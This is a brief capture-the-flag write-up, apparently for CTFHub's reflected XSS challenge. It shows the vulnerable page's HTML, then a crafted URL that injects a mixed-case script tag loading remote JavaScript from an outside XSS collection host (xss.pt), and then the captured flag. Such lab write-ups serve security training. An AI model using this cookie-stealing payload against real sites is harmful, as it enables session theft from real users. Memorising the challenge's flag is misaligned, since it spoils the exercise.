XSS

反射型

image.png

  1. <div class="container">
  2.         <div class="jumbotron text-center">
  3.             <h1>XSS Reflex</h1>
  4.             <hr>
  5.             <div id="alert">
  6.                 <div id="success" class="alert alert-success" role="alert" style="display: none;"></div>
  7.                 <div id="fail" class="alert alert-danger" role="alert" style="display: none;"></div>
  8.             </div>
  9.             <form action="" method="GET">
  10.                 <div class="input-group mb-3">
  11.                     <div class="input-group-prepend">
  12.                         <span class="input-group-text">What's your name</span>
  13.                     </div>
  14.                     <input type="text" class="form-control" placeholder="CTFHub" id="name" name="name">
  15.                     <div class="input-group-append">
  16.                         <input type="submit" value="Submit" class="btn btn-success">
  17.                     </div>
  18.                 </div>
  19.             </form>
  20.             <!-- Output -->
  21.             <hr>
  22.             <div>
  23.                 <h1>Hello, CTFHub</h1>
  24.             </div>
  25.             <hr>
  26.             <!-- Submit -->
  27.             <div class="input-group mb-3">
  28.                 <div class="input-group-prepend">
  29.                     <span class="input-group-text">Send URL to Bot</span>
  30.                 </div>
  31.                 <input type="text" class="form-control" id="url" name="url">
  32.                 <div class="input-group-append">
  33.                     <input type="button" id="Send" value="Send" class="btn btn-success" onclick="send()">
  34.                 </div>
  35.             </div>
  36.         </div>
  37.     </div>

image.png

http://challenge-43514f8ac5ec5947.sandbox.ctfhub.com:10800/?name=%3CsCRiPt%20sRC%3D%2F%2Fxss.pt%2F2RPN%3E%3C%2FsCrIpT%3E

image.png

image.png

flag=ctfhub{928bb49007ccbb91913161b1}